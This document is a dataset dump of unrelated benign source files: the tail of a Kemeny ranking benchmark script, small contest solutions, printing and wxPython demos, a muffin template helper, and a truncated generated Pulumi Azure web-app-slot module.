[0,20,26,23,22,25,22,31,23,24,29],
[31,0,31,23,29,28,29,27,29,29,25],
[25,20,0,20,23,25,26,25,24,21,26],
[28,28,31,0,29,26,23,31,25,27,24],
[29,22,28,22,0,29,28,31,27,28,26],
[26,23,26,25,22,0,21,25,24,21,22],
[29,22,25,28,23,30,0,28,28,24,26],
[20,24,26,20,20,26,23,0,22,20,27],
[28,22,27,26,24,27,23,29,0,23,23],
[27,22,30,24,23,30,27,31,28,0,31],
[22,26,25,27,25,29,25,24,28,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 195, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,31,26,27,33,23,24,28,24,27],
[23,0,28,25,28,25,23,25,27,28,30],
[20,23,0,25,24,25,20,24,22,23,22],
[25,26,26,0,28,28,20,29,27,26,26],
[24,23,27,23,0,27,21,22,27,24,21],
[18,26,26,23,24,0,26,22,20,22,26],
[28,28,31,31,30,25,0,30,28,29,27],
[27,26,27,22,29,29,21,0,24,27,27],
[23,24,29,24,24,31,23,27,0,23,24],
[27,23,28,25,27,29,22,24,28,0,26],
[24,21,29,25,30,25,24,24,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 196, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,19,29,27,28,21,23,28,26,25],
[25,0,19,26,22,26,23,25,28,19,25],
[32,32,0,30,34,26,26,25,29,26,29],
[22,25,21,0,26,21,27,23,28,22,19],
[24,29,17,25,0,22,19,22,24,20,22],
[23,25,25,30,29,0,27,24,27,28,31],
[30,28,25,24,32,24,0,24,26,26,24],
[28,26,26,28,29,27,27,0,29,24,31],
[23,23,22,23,27,24,25,22,0,24,22],
[25,32,25,29,31,23,25,27,27,0,28],
[26,26,22,32,29,20,27,20,29,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 197, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,19,31,24,25,24,25,26,28,31],
[19,0,17,26,29,29,30,23,16,27,25],
[32,34,0,41,35,28,38,25,24,31,47],
[20,25,10,0,17,22,21,29,19,24,17],
[27,22,16,34,0,22,22,26,19,21,24],
[26,22,23,29,29,0,35,24,20,29,36],
[27,21,13,30,29,16,0,20,18,24,28],
[26,28,26,22,25,27,31,0,23,26,31],
[25,35,27,32,32,31,33,28,0,28,35],
[23,24,20,27,30,22,27,25,23,0,25],
[20,26,4,34,27,15,23,20,16,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 198, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,30,27,29,25,26,30,31,26,30],
[26,0,30,24,33,28,25,29,29,27,27],
[21,21,0,23,23,18,18,23,24,21,23],
[24,27,28,0,26,23,30,29,27,28,26],
[22,18,28,25,0,22,21,26,23,23,22],
[26,23,33,28,29,0,30,32,30,28,31],
[25,26,33,21,30,21,0,30,28,25,26],
[21,22,28,22,25,19,21,0,23,22,24],
[20,22,27,24,28,21,23,28,0,24,27],
[25,24,30,23,28,23,26,29,27,0,27],
[21,24,28,25,29,20,25,27,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 199, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,25,21,20,23,22,24,23,22,22],
[27,0,25,17,23,22,20,25,26,28,24],
[26,26,0,22,24,27,24,24,29,31,26],
[30,34,29,0,26,31,23,27,30,28,26],
[31,28,27,25,0,22,25,23,26,20,31],
[28,29,24,20,29,0,24,23,29,28,26],
[29,31,27,28,26,27,0,28,25,26,27],
[27,26,27,24,28,28,23,0,24,27,24],
[28,25,22,21,25,22,26,27,0,26,29],
[29,23,20,23,31,23,25,24,25,0,21],
[29,27,25,25,20,25,24,27,22,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 200, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
pd.DataFrame(results).to_csv("/Users/noeliarico/Desktop/folder-kemeny/2021EJOR/results/mebb/mebb_11_51.csv", index=False, header=False) | [
"[email protected]"
] | |
6ae2af63c360ac6ce8e469d4ef399d5bd20040d2 | 6e4e6b64c035881f1cff39db616b0a80e1568c51 | /JOI7Qual/q1.py | 360741c86f3ad98b0fc70d4bc433923644dfa0f2 | [] | no_license | Lischero/Atcoder | f7471a85ee553e3ae791e3e5670468aea1fa53cc | f674d6a20a56eebdafa6d50d5d2d0f4030e5eace | refs/heads/master | 2020-05-21T16:23:36.095929 | 2018-10-18T04:27:55 | 2018-10-18T04:27:55 | 60,671,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | # -*- coding:utf-8 -*-
N = int(input())
change = 1000 - N
factors = [500, 100, 50, 10, 5, 1]
ans = 0
for factor in factors:
while change >= factor:
change -= factor
ans += 1
print(ans)
| [
"[email protected]"
] | |
e2e6ae133a3c7d5e2a67478e807b2afbce460c4e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02921/s327676216.py | 8d79966a0d9b41817f7a2c90ca060bbf016f3e46 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | # -*- coding: utf-8 -*-
## Library
import sys
from fractions import gcd
import math
from math import ceil,floor
import collections
from collections import Counter
import itertools
import copy
## input
# N=int(input())
# A,B,C,D=map(int, input().split())
# S = input()
# yoko = list(map(int, input().split()))
# tate = [int(input()) for _ in range(N)]
# N, M = map(int,input().split())
# P = [list(map(int,input().split())) for i in range(M)]
# S = []
# for _ in range(N):
# S.append(list(input()))
S = input()
T = input()
# Count the indices where S and T hold the same character.  zip() pairs
# the characters one-to-one, which generalises the original hard-coded
# range(3) loop to any equal-length inputs (the contest inputs are
# length 3, so behaviour is unchanged there).  `ans` stays module-level
# because the print statement below this block consumes it.
ans = sum(1 for a, b in zip(S, T) if a == b)
print(ans) | [
"[email protected]"
] | |
8a1420991c7365f09dd23479368f9c23d3c181f4 | 485cf3c70fcaa68689a2b690b6465f1d6bcf21bd | /Python_Coding_Tips/Code_py/Code(实例源码及使用说明)/01/11/2.列表拼接的4种方法/demo04.py | 9c2228030fefdd2ff56cc3049a75ad004b1c1f83 | [] | no_license | lxz0503/study_20190608 | 5ffe08c4704bb00ad8d1980baf16b8f5e7135ff4 | 47c37798140883b8d6dc21ec5da5bc7a20988ce9 | refs/heads/master | 2022-12-23T17:23:45.039015 | 2021-06-23T14:50:19 | 2021-06-23T14:50:19 | 190,884,812 | 1 | 3 | null | 2022-12-15T23:17:33 | 2019-06-08T12:22:56 | Python | UTF-8 | Python | false | false | 1,015 | py | # *_* coding : UTF-8 *_*
# 开发团队 :明日科技
# 开发人员 :Administrator
# 开发时间 :2019/7/1 15:32
# 文件名称 :demo04.py
# 开发工具 :PyCharm
# Car-sales figures as [brand, units] pairs for three markets — the
# variable names suggest gem = Germany, fra = France, eng = England
# (TODO confirm against the source material).  Brand names stay in
# Chinese because the program prints them verbatim.
gem = [["大众",643518],["奔驰",319163],["宝马",265051],["福特",252323],["雪铁龙",227967],["奥迪",255300]]
fra = [["雪铁龙", 698985],["雷诺",547704],["大众",259268],["福特",82633],["宝马",84931],["奔驰",73254]]
eng = [["福特",254082],["大众",203150],["雪铁龙",177298],["奔驰",172238],["宝马",172048],["奥迪",143739]]
# First pass: print the three markets side by side without padding,
# so the columns do not line up.
for item1, item2, item3 in zip(gem, fra, eng):
    print(item1[0], item1[1], " ", item2[0], item2[1], " ", item3[0], item3[1])
# Second pass: left-justify every field to width 8 so the columns align.
for item1, item2, item3 in zip(gem, fra, eng):
    item11 = item1[0].ljust(8)
    item12 = str(item1[1]).ljust(8)
    item21 = item2[0].ljust(8)
    item22 = str(item2[1]).ljust(8)
    # BUG FIX: the third column's brand must come from item3 (third
    # table); the original read item1[0] and repeated the first table's
    # brand name in the third column.
    item31 = item3[0].ljust(8)
    item32 = str(item3[1]).ljust(8)
    print(item11+"\t", item12+"\t", " ", item21+"\t", item22+"\t", " ", item31+"\t", item32)
| [
"[email protected]"
] | |
c7c5b0151c352832384a07e85f6e49c5f966ec94 | a0947c2778742aec26b1c0600ceca17df42326cd | /Python/PythonInADay2/CSV-Files-Drill/37of79-87.py | c6d72c705eb76b99aaf1d8f9ab163131ca821099 | [] | no_license | JohnCDunn/Course-Work-TTA | 5758319d4607114914ba9723328658bed8fb2024 | 8c4f60d51007dac2ac4cceb84b0f9666e143c0d7 | refs/heads/master | 2021-01-10T16:37:02.609879 | 2016-02-01T18:05:38 | 2016-02-01T18:05:38 | 49,983,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | import wx
class Frame(wx.Frame):
    """A fixed-size top-level window holding a single numeric spin control."""

    def __init__(self, title):
        # Parent-less (None) top-level frame, fixed at 300x250 pixels.
        super().__init__(None, title=title, size=(300, 250))
        # The panel hosts the widget; no reference to the spin control is
        # kept — it is created purely for its side effect of appearing
        # on the panel.
        content = wx.Panel(self)
        wx.SpinCtrl(content, value='0', pos=(130, 50), size=(70, 25))
# Standard wxPython bootstrap: create the application object first, then
# the top-level frame, show it, and hand control to the GUI event loop.
# MainLoop() blocks here until the window is closed.
app = wx.App()
frame = Frame("wxPython Widgets!")
frame.Show()
app.MainLoop()
| [
"[email protected]"
] | |
3cacda28f5023df250d156ab5a4eff4b61274f2e | dc77896138400114f6770310591fbfb02e36d3cd | /{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/common/utils.py | cf5bc6fc70109d2f501aa0fa00154039301d810c | [
"MIT"
] | permissive | drgarcia1986/cookiecutter-muffin | 97163a66a57d83dc802223ccbd5307bd1896429d | 7aa861787b4280477a726da99cf9de4047b01d91 | refs/heads/master | 2021-01-01T16:34:08.043952 | 2015-08-27T22:19:35 | 2015-08-27T22:31:22 | 40,458,394 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | import muffin
from .. import app
@app.ps.jinja2.context_processor
def current_user_context():
    """Expose the request-bound current user to Jinja2 templates as ``user``.

    Raises AttributeError if no ``current_user`` was stored on the
    loop-local state (same behaviour as the default-less getattr in the
    original implementation).
    """
    request_state = muffin.local(app.loop)
    return {'user': getattr(request_state, 'current_user')}
| [
"[email protected]"
] | |
bbc418a42973b051de3e9c10d573895219af86b0 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/web/v20200901/get_web_app_slot.py | dae31f66a42b428754b1c8f79c1670fe27468c36 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,519 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetWebAppSlotResult',
'AwaitableGetWebAppSlotResult',
'get_web_app_slot',
'get_web_app_slot_output',
]
@pulumi.output_type
class GetWebAppSlotResult:
"""
A web app, a mobile app backend, or an API app.
"""
def __init__(__self__, availability_state=None, client_affinity_enabled=None, client_cert_enabled=None, client_cert_exclusion_paths=None, client_cert_mode=None, container_size=None, custom_domain_verification_id=None, daily_memory_time_quota=None, default_host_name=None, enabled=None, enabled_host_names=None, host_name_ssl_states=None, host_names=None, host_names_disabled=None, hosting_environment_profile=None, https_only=None, hyper_v=None, id=None, identity=None, in_progress_operation_id=None, is_default_container=None, is_xenon=None, kind=None, last_modified_time_utc=None, location=None, max_number_of_workers=None, name=None, outbound_ip_addresses=None, possible_outbound_ip_addresses=None, redundancy_mode=None, repository_site_name=None, reserved=None, resource_group=None, scm_site_also_stopped=None, server_farm_id=None, site_config=None, slot_swap_status=None, state=None, suspended_till=None, system_data=None, tags=None, target_swap_slot=None, traffic_manager_host_names=None, type=None, usage_state=None):
if availability_state and not isinstance(availability_state, str):
raise TypeError("Expected argument 'availability_state' to be a str")
pulumi.set(__self__, "availability_state", availability_state)
if client_affinity_enabled and not isinstance(client_affinity_enabled, bool):
raise TypeError("Expected argument 'client_affinity_enabled' to be a bool")
pulumi.set(__self__, "client_affinity_enabled", client_affinity_enabled)
if client_cert_enabled and not isinstance(client_cert_enabled, bool):
raise TypeError("Expected argument 'client_cert_enabled' to be a bool")
pulumi.set(__self__, "client_cert_enabled", client_cert_enabled)
if client_cert_exclusion_paths and not isinstance(client_cert_exclusion_paths, str):
raise TypeError("Expected argument 'client_cert_exclusion_paths' to be a str")
pulumi.set(__self__, "client_cert_exclusion_paths", client_cert_exclusion_paths)
if client_cert_mode and not isinstance(client_cert_mode, str):
raise TypeError("Expected argument 'client_cert_mode' to be a str")
pulumi.set(__self__, "client_cert_mode", client_cert_mode)
if container_size and not isinstance(container_size, int):
raise TypeError("Expected argument 'container_size' to be a int")
pulumi.set(__self__, "container_size", container_size)
if custom_domain_verification_id and not isinstance(custom_domain_verification_id, str):
raise TypeError("Expected argument 'custom_domain_verification_id' to be a str")
pulumi.set(__self__, "custom_domain_verification_id", custom_domain_verification_id)
if daily_memory_time_quota and not isinstance(daily_memory_time_quota, int):
raise TypeError("Expected argument 'daily_memory_time_quota' to be a int")
pulumi.set(__self__, "daily_memory_time_quota", daily_memory_time_quota)
if default_host_name and not isinstance(default_host_name, str):
raise TypeError("Expected argument 'default_host_name' to be a str")
pulumi.set(__self__, "default_host_name", default_host_name)
if enabled and not isinstance(enabled, bool):
raise TypeError("Expected argument 'enabled' to be a bool")
pulumi.set(__self__, "enabled", enabled)
if enabled_host_names and not isinstance(enabled_host_names, list):
raise TypeError("Expected argument 'enabled_host_names' to be a list")
pulumi.set(__self__, "enabled_host_names", enabled_host_names)
if host_name_ssl_states and not isinstance(host_name_ssl_states, list):
raise TypeError("Expected argument 'host_name_ssl_states' to be a list")
pulumi.set(__self__, "host_name_ssl_states", host_name_ssl_states)
if host_names and not isinstance(host_names, list):
raise TypeError("Expected argument 'host_names' to be a list")
pulumi.set(__self__, "host_names", host_names)
if host_names_disabled and not isinstance(host_names_disabled, bool):
raise TypeError("Expected argument 'host_names_disabled' to be a bool")
pulumi.set(__self__, "host_names_disabled", host_names_disabled)
if hosting_environment_profile and not isinstance(hosting_environment_profile, dict):
raise TypeError("Expected argument 'hosting_environment_profile' to be a dict")
pulumi.set(__self__, "hosting_environment_profile", hosting_environment_profile)
if https_only and not isinstance(https_only, bool):
raise TypeError("Expected argument 'https_only' to be a bool")
pulumi.set(__self__, "https_only", https_only)
if hyper_v and not isinstance(hyper_v, bool):
raise TypeError("Expected argument 'hyper_v' to be a bool")
pulumi.set(__self__, "hyper_v", hyper_v)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if in_progress_operation_id and not isinstance(in_progress_operation_id, str):
raise TypeError("Expected argument 'in_progress_operation_id' to be a str")
pulumi.set(__self__, "in_progress_operation_id", in_progress_operation_id)
if is_default_container and not isinstance(is_default_container, bool):
raise TypeError("Expected argument 'is_default_container' to be a bool")
pulumi.set(__self__, "is_default_container", is_default_container)
if is_xenon and not isinstance(is_xenon, bool):
raise TypeError("Expected argument 'is_xenon' to be a bool")
pulumi.set(__self__, "is_xenon", is_xenon)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if last_modified_time_utc and not isinstance(last_modified_time_utc, str):
raise TypeError("Expected argument 'last_modified_time_utc' to be a str")
pulumi.set(__self__, "last_modified_time_utc", last_modified_time_utc)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if max_number_of_workers and not isinstance(max_number_of_workers, int):
raise TypeError("Expected argument 'max_number_of_workers' to be a int")
pulumi.set(__self__, "max_number_of_workers", max_number_of_workers)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if outbound_ip_addresses and not isinstance(outbound_ip_addresses, str):
raise TypeError("Expected argument 'outbound_ip_addresses' to be a str")
pulumi.set(__self__, "outbound_ip_addresses", outbound_ip_addresses)
if possible_outbound_ip_addresses and not isinstance(possible_outbound_ip_addresses, str):
raise TypeError("Expected argument 'possible_outbound_ip_addresses' to be a str")
pulumi.set(__self__, "possible_outbound_ip_addresses", possible_outbound_ip_addresses)
if redundancy_mode and not isinstance(redundancy_mode, str):
raise TypeError("Expected argument 'redundancy_mode' to be a str")
pulumi.set(__self__, "redundancy_mode", redundancy_mode)
if repository_site_name and not isinstance(repository_site_name, str):
raise TypeError("Expected argument 'repository_site_name' to be a str")
pulumi.set(__self__, "repository_site_name", repository_site_name)
if reserved and not isinstance(reserved, bool):
raise TypeError("Expected argument 'reserved' to be a bool")
pulumi.set(__self__, "reserved", reserved)
if resource_group and not isinstance(resource_group, str):
raise TypeError("Expected argument 'resource_group' to be a str")
pulumi.set(__self__, "resource_group", resource_group)
if scm_site_also_stopped and not isinstance(scm_site_also_stopped, bool):
raise TypeError("Expected argument 'scm_site_also_stopped' to be a bool")
pulumi.set(__self__, "scm_site_also_stopped", scm_site_also_stopped)
if server_farm_id and not isinstance(server_farm_id, str):
raise TypeError("Expected argument 'server_farm_id' to be a str")
pulumi.set(__self__, "server_farm_id", server_farm_id)
if site_config and not isinstance(site_config, dict):
raise TypeError("Expected argument 'site_config' to be a dict")
pulumi.set(__self__, "site_config", site_config)
if slot_swap_status and not isinstance(slot_swap_status, dict):
raise TypeError("Expected argument 'slot_swap_status' to be a dict")
pulumi.set(__self__, "slot_swap_status", slot_swap_status)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if suspended_till and not isinstance(suspended_till, str):
raise TypeError("Expected argument 'suspended_till' to be a str")
pulumi.set(__self__, "suspended_till", suspended_till)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if target_swap_slot and not isinstance(target_swap_slot, str):
raise TypeError("Expected argument 'target_swap_slot' to be a str")
pulumi.set(__self__, "target_swap_slot", target_swap_slot)
if traffic_manager_host_names and not isinstance(traffic_manager_host_names, list):
raise TypeError("Expected argument 'traffic_manager_host_names' to be a list")
pulumi.set(__self__, "traffic_manager_host_names", traffic_manager_host_names)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if usage_state and not isinstance(usage_state, str):
raise TypeError("Expected argument 'usage_state' to be a str")
pulumi.set(__self__, "usage_state", usage_state)
@property
@pulumi.getter(name="availabilityState")
def availability_state(self) -> str:
"""
Management information availability state for the app.
"""
return pulumi.get(self, "availability_state")
@property
@pulumi.getter(name="clientAffinityEnabled")
def client_affinity_enabled(self) -> Optional[bool]:
"""
<code>true</code> to enable client affinity; <code>false</code> to stop sending session affinity cookies, which route client requests in the same session to the same instance. Default is <code>true</code>.
"""
return pulumi.get(self, "client_affinity_enabled")
@property
@pulumi.getter(name="clientCertEnabled")
def client_cert_enabled(self) -> Optional[bool]:
"""
<code>true</code> to enable client certificate authentication (TLS mutual authentication); otherwise, <code>false</code>. Default is <code>false</code>.
"""
return pulumi.get(self, "client_cert_enabled")
@property
@pulumi.getter(name="clientCertExclusionPaths")
def client_cert_exclusion_paths(self) -> Optional[str]:
"""
client certificate authentication comma-separated exclusion paths
"""
return pulumi.get(self, "client_cert_exclusion_paths")
@property
@pulumi.getter(name="clientCertMode")
def client_cert_mode(self) -> Optional[str]:
"""
This composes with ClientCertEnabled setting.
- ClientCertEnabled: false means ClientCert is ignored.
- ClientCertEnabled: true and ClientCertMode: Required means ClientCert is required.
- ClientCertEnabled: true and ClientCertMode: Optional means ClientCert is optional or accepted.
"""
return pulumi.get(self, "client_cert_mode")
@property
@pulumi.getter(name="containerSize")
def container_size(self) -> Optional[int]:
"""
Size of the function container.
"""
return pulumi.get(self, "container_size")
@property
@pulumi.getter(name="customDomainVerificationId")
def custom_domain_verification_id(self) -> Optional[str]:
"""
Unique identifier that verifies the custom domains assigned to the app. Customer will add this id to a txt record for verification.
"""
return pulumi.get(self, "custom_domain_verification_id")
@property
@pulumi.getter(name="dailyMemoryTimeQuota")
def daily_memory_time_quota(self) -> Optional[int]:
"""
Maximum allowed daily memory-time quota (applicable on dynamic apps only).
"""
return pulumi.get(self, "daily_memory_time_quota")
@property
@pulumi.getter(name="defaultHostName")
def default_host_name(self) -> str:
"""
Default hostname of the app. Read-only.
"""
return pulumi.get(self, "default_host_name")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
<code>true</code> if the app is enabled; otherwise, <code>false</code>. Setting this value to false disables the app (takes the app offline).
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="enabledHostNames")
def enabled_host_names(self) -> Sequence[str]:
"""
Enabled hostnames for the app.Hostnames need to be assigned (see HostNames) AND enabled. Otherwise,
the app is not served on those hostnames.
"""
return pulumi.get(self, "enabled_host_names")
@property
@pulumi.getter(name="hostNameSslStates")
def host_name_ssl_states(self) -> Optional[Sequence['outputs.HostNameSslStateResponse']]:
"""
Hostname SSL states are used to manage the SSL bindings for app's hostnames.
"""
return pulumi.get(self, "host_name_ssl_states")
@property
@pulumi.getter(name="hostNames")
def host_names(self) -> Sequence[str]:
"""
Hostnames associated with the app.
"""
return pulumi.get(self, "host_names")
@property
@pulumi.getter(name="hostNamesDisabled")
def host_names_disabled(self) -> Optional[bool]:
"""
<code>true</code> to disable the public hostnames of the app; otherwise, <code>false</code>.
If <code>true</code>, the app is only accessible via API management process.
"""
return pulumi.get(self, "host_names_disabled")
@property
@pulumi.getter(name="hostingEnvironmentProfile")
def hosting_environment_profile(self) -> Optional['outputs.HostingEnvironmentProfileResponse']:
"""
App Service Environment to use for the app.
"""
return pulumi.get(self, "hosting_environment_profile")
@property
@pulumi.getter(name="httpsOnly")
def https_only(self) -> Optional[bool]:
"""
HttpsOnly: configures a web site to accept only https requests. Issues redirect for
http requests
"""
return pulumi.get(self, "https_only")
@property
@pulumi.getter(name="hyperV")
def hyper_v(self) -> Optional[bool]:
"""
Hyper-V sandbox.
"""
return pulumi.get(self, "hyper_v")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.ManagedServiceIdentityResponse']:
"""
Managed service identity.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter(name="inProgressOperationId")
def in_progress_operation_id(self) -> str:
"""
Specifies an operation id if this site has a pending operation.
"""
return pulumi.get(self, "in_progress_operation_id")
@property
@pulumi.getter(name="isDefaultContainer")
def is_default_container(self) -> bool:
"""
<code>true</code> if the app is a default container; otherwise, <code>false</code>.
"""
return pulumi.get(self, "is_default_container")
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[bool]:
"""
Obsolete: Hyper-V sandbox.
"""
return pulumi.get(self, "is_xenon")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="lastModifiedTimeUtc")
def last_modified_time_utc(self) -> str:
"""
Last time the app was modified, in UTC. Read-only.
"""
return pulumi.get(self, "last_modified_time_utc")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource Location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="maxNumberOfWorkers")
def max_number_of_workers(self) -> int:
"""
Maximum number of workers.
This only applies to Functions container.
"""
return pulumi.get(self, "max_number_of_workers")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> str:
"""
List of IP addresses that the app uses for outbound connections (e.g. database access). Includes VIPs from tenants that site can be hosted with current settings. Read-only.
"""
return pulumi.get(self, "outbound_ip_addresses")
@property
@pulumi.getter(name="possibleOutboundIpAddresses")
def possible_outbound_ip_addresses(self) -> str:
"""
List of IP addresses that the app uses for outbound connections (e.g. database access). Includes VIPs from all tenants except dataComponent. Read-only.
"""
return pulumi.get(self, "possible_outbound_ip_addresses")
@property
@pulumi.getter(name="redundancyMode")
def redundancy_mode(self) -> Optional[str]:
"""
Site redundancy mode
"""
return pulumi.get(self, "redundancy_mode")
@property
@pulumi.getter(name="repositorySiteName")
def repository_site_name(self) -> str:
"""
Name of the repository site.
"""
return pulumi.get(self, "repository_site_name")
@property
@pulumi.getter
def reserved(self) -> Optional[bool]:
"""
<code>true</code> if reserved; otherwise, <code>false</code>.
"""
return pulumi.get(self, "reserved")
@property
@pulumi.getter(name="resourceGroup")
def resource_group(self) -> str:
"""
Name of the resource group the app belongs to. Read-only.
"""
return pulumi.get(self, "resource_group")
@property
@pulumi.getter(name="scmSiteAlsoStopped")
def scm_site_also_stopped(self) -> Optional[bool]:
"""
<code>true</code> to stop SCM (KUDU) site when the app is stopped; otherwise, <code>false</code>. The default is <code>false</code>.
"""
return pulumi.get(self, "scm_site_also_stopped")
@property
@pulumi.getter(name="serverFarmId")
def server_farm_id(self) -> Optional[str]:
"""
Resource ID of the associated App Service plan, formatted as: "/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
"""
return pulumi.get(self, "server_farm_id")
@property
@pulumi.getter(name="siteConfig")
def site_config(self) -> Optional['outputs.SiteConfigResponse']:
"""
Configuration of the app.
"""
return pulumi.get(self, "site_config")
@property
@pulumi.getter(name="slotSwapStatus")
def slot_swap_status(self) -> 'outputs.SlotSwapStatusResponse':
"""
Status of the last deployment slot swap operation.
"""
return pulumi.get(self, "slot_swap_status")
@property
@pulumi.getter
def state(self) -> str:
"""
Current state of the app.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="suspendedTill")
def suspended_till(self) -> str:
"""
App suspended till in case memory-time quota is exceeded.
"""
return pulumi.get(self, "suspended_till")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetSwapSlot")
def target_swap_slot(self) -> str:
"""
Specifies which deployment slot this app will swap into. Read-only.
"""
return pulumi.get(self, "target_swap_slot")
@property
@pulumi.getter(name="trafficManagerHostNames")
def traffic_manager_host_names(self) -> Sequence[str]:
"""
Azure Traffic Manager hostnames associated with the app. Read-only.
"""
return pulumi.get(self, "traffic_manager_host_names")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="usageState")
def usage_state(self) -> str:
"""
State indicating whether the app has exceeded its quota usage. Read-only.
"""
return pulumi.get(self, "usage_state")
class AwaitableGetWebAppSlotResult(GetWebAppSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSlotResult(
availability_state=self.availability_state,
client_affinity_enabled=self.client_affinity_enabled,
client_cert_enabled=self.client_cert_enabled,
client_cert_exclusion_paths=self.client_cert_exclusion_paths,
